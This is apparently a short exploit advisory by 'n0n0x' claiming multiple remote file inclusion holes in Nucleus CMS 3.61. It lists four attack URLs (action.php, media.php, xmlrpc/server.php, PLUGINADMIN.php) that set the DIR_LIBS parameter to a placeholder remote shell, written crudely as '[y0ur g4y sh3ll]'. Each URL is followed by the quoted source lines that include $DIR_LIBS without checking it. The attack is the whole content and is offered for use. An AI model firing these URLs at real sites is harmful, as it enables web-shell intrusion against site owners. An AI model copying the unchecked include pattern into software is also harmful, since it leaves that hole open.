#Nucleus v3.61 <=== Multiple Remote File Include
#By n0n0x
#Homepage: http://priasantai.uni.cc/
#Download script :http://sourceforge.net/projects/nucleuscms/
nucleus3.61/action.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
13. /**
14.* File containing actions that can be performed by visitors of the site,
15.* like adding comments, etc...
16.* @license http://nucleuscms.org/license.txt GNU General Public License
17.* @copyright Copyright (C) 2002-2009 The Nucleus Group
18.* @version $Id: action.php 1388 2009-07-18 06:31:28Z shizuki $
21. $CONF = array();
22. require('./config.php');
24. // common functions
25. include_once($DIR_LIBS . 'ACTION.php');<=== RFI vuln
nucleus3.61/nucleus/media.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
35. // include all classes and config data
36. require('../config.php');
37. include($DIR_LIBS . 'MEDIA.php'); // media classes
nucleus3.61/nucleus/xmlrpc/server.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
63.* @license http://nucleuscms.org/license.txt GNU General Public License
64.* @copyright Copyright (C) 2002-2009 The Nucleus Group
67.* @version $Id: server.php 1388 2009-07-18 06:31:28Z shizuki $
69. $CONF = array();
70. require("../../config.php"); // include Nucleus libs and code
71. include($DIR_LIBS . "xmlrpc.inc.php");
nucleus3.61/nucleus/libs/PLUGINADMIN.php?DIR_LIBS=[y0ur g4y sh3ll]?????????????
class PluginAdmin {
var $strFullName; // NP_SomeThing
var $plugin; // ref. to plugin object
var $bValid; // evaluates to true when object is considered valid
var $admin; // ref to an admin object
function PluginAdmin($pluginName)
global $manager;
include_once($DIR_LIBS . 'ADMIN.php');
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